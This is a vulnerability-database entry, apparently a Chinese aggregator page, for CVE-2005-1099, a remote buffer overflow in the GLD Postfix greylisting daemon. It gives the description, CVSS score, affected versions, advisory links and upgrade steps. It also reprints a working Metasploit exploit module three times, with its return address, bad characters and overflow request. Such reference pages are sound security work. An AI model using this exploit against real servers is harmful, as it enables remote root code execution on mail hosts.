CVE-2005-1099
CVSS10.0
发布时间 :2005-04-12 00:00:00
修订时间 :2016-10-17 23:17:09
NMCOEPS    

[原文]Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.


[CNNVD]Salim Gasmi GLD Postfix Greylisting守护进程缓冲区溢出漏洞(CNNVD-200504-025)

        Greylisting daemon是一个在邮件服务器上实现"灰名单"的软件包。
        Greylisting daemon (GLD) 1.3及1.4版本中的server.c的HandleChild函数存在多个缓冲区溢出,当GLD在监听网络接口时,远程攻击者可以借此来执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:salim_gasmi:gld:1.2
cpe:/a:salim_gasmi:gld:1.4
cpe:/a:salim_gasmi:gld:1.1
cpe:/a:salim_gasmi:gld:1.3
cpe:/a:salim_gasmi:gld:1.3.1
cpe:/a:salim_gasmi:gld:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1099
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1099
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-025
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111339935903880&w=2
(UNKNOWN)  BUGTRAQ  20050412 GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
http://marc.info/?l=bugtraq&m=111342432325670&w=2
(UNKNOWN)  BUGTRAQ  20050413 Gld 1.5 released (security fix)
http://security.gentoo.org/glsa/glsa-200504-10.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200504-10
http://securitytracker.com/alerts/2005/Apr/1013678.html
(VENDOR_ADVISORY)  SECTRACK  1013678
http://www.gasmi.net/down/gld-history
(VENDOR_ADVISORY)  CONFIRM  http://www.gasmi.net/down/gld-history
http://xforce.iss.net/xforce/xfdb/20066
(VENDOR_ADVISORY)  XF  gld-serverc-bo(20066)

- 漏洞信息

Salim Gasmi GLD Postfix Greylisting守护进程缓冲区溢出漏洞
危急 缓冲区溢出
2005-04-12 00:00:00 2005-10-20 00:00:00
远程  
        Greylisting daemon是一个在邮件服务器上实现"灰名单"的软件包。
        Greylisting daemon (GLD) 1.3及1.4版本中的server.c的HandleChild函数存在多个缓冲区溢出,当GLD在监听网络接口时,远程攻击者可以借此来执行任意代码。

- 公告与补丁

        
        

- 漏洞信息 (10023)

Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow (EDBID:10023)
linux remote
2005-04-12 Verified
2525 patrick
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision$',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end
	
	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end
		

- 漏洞信息 (16841)

GLD (Greylisting Daemon) Postfix Buffer Overflow (EDBID:16841)
linux remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack buffer overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision: 9669 $',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0,
			'DisclosureDate'  => 'Apr 12 2005'
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end

	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end
		

- 漏洞信息 (F82242)

GLD (Greylisting Daemon) Postfix Buffer Overflow (PacketStormID:F82242)
2009-10-27 00:00:00
patrick  
exploit,overflow
CVE-2005-1099
[点击下载]

This Metasploit module exploits a stack overflow in the Salim Gasmi GLD versions 1.4 and below greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision$',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end
	
	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end

    

- 漏洞信息

15492
GLD server.c Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.

- 时间线

2005-04-12 Unknow
2005-04-12 Unknow

- 解决方案

Upgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability
Boundary Condition Error 13129
Yes No
2005-04-12 12:00:00 2009-07-12 12:56:00
"dong-hun you" <xploit@hackermail.com> disclosed this vulnerability.

- 受影响的程序版本

Salim Gasmi GLD 1.4
+ Gentoo Linux
Salim Gasmi GLD 1.3.1
Salim Gasmi GLD 1.3
Salim Gasmi GLD 1.2
Salim Gasmi GLD 1.1
Salim Gasmi GLD 1.0
Salim Gasmi GLD 1.5
+ Gentoo Linux

- 不受影响的程序版本

Salim Gasmi GLD 1.5
+ Gentoo Linux

- 漏洞讨论

It is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it.

Remote attackers may exploit this vulnerability to cause arbitrary machine code to be executed in the context of the affected service. As the service is designed to be run as the superuser, remote attackers may gain superuser privileges on affected computers.

GLD version 1.4 is reportedly affected, but prior versions may also be affected.

- 漏洞利用

A proof of concept exploit was provided by "you dong-hun"(Xpl017Elz) &lt;szoahc@hotmail.com&gt;:

- 解决方案

Gentoo Linux has released advisory GLSA 200504-10 dealing with this and other issues. Gentoo advises that all users update their packages by carrying out the following commands with superuser privileges:

emerge --sync
emerge --ask --oneshot --verbose ">=mail-filter/gld-1.5"

For more information, please see the referenced Gentoo Linux advisory.

The vendor, Salim Gasmi, has released an upgrade resolving these issues.


Salim Gasmi GLD 1.0

Salim Gasmi GLD 1.1

Salim Gasmi GLD 1.2

Salim Gasmi GLD 1.3

Salim Gasmi GLD 1.3.1

Salim Gasmi GLD 1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站